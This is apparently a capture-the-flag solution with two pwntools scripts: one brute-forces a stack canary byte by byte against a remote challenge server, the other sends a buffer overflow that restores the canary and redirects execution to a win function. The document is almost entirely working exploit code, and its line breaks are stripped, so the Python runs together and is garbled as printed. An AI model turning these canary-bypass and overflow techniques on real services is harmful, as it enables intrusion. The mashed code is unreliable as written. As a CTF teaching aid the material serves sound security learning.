Do you think you can bypass the protection and get the flag?
Solution
canary_brute.py
from pwn import*import stringelf = context.binary =ELF('./vuln', checksec=False)context.log_level ='critical'canary =""whilelen(canary)<4: not_found =Truewhile not_found:for i in string.printable:# p = elf.process() p =remote('saturn.picoctf.net', 63681) padding =64 test = canary + iprint(test) payload =b'A'* padding payload +=f'{test}'.encode() p.sendlineafter(b'>', str(len(payload)).encode()) p.sendlineafter(b'>', payload)ifb'Smashing'in p.recvline(): p.close()continueelse: canary += i not_found =False p.close()break
exploit.py
from pwn import*# Allows you to switch between local/GDB/remote from terminaldefstart(argv=[],*a,**kw):if args.GDB:# Set GDBscript belowreturn gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)elif args.REMOTE:# ('server', 'port')returnremote(sys.argv[1], sys.argv[2], *a, **kw)else:# Run locallyreturnprocess([exe] + argv, *a, **kw)# Specify your GDB script here for debugginggdbscript ='''init-pwndbgbreak *0x8049534continue'''.format(**locals())# Set up pwntools for the correct architectureexe ='./vuln'# This will automatically get context arch, bits, os etcelf = context.binary =ELF(exe, checksec=False)# Change logging level to help with debugging (error/warning/info/debug)context.log_level ='debug'# ===========================================================# EXPLOIT GOES HERE# ===========================================================io =start()# How many bytes to the instruction pointer (EIP)?padding =64payload =flat(b'A'* padding,b'BiRd', # Canary is hereb'A'*16, # Saved RBP + int elf.symbols.win)io.sendlineafter(b'>', str(len(payload)).encode())# Send the payloadio.sendlineafter(b'>', payload)# Receive the flagio.recvuntil(b'?')io.interactive()
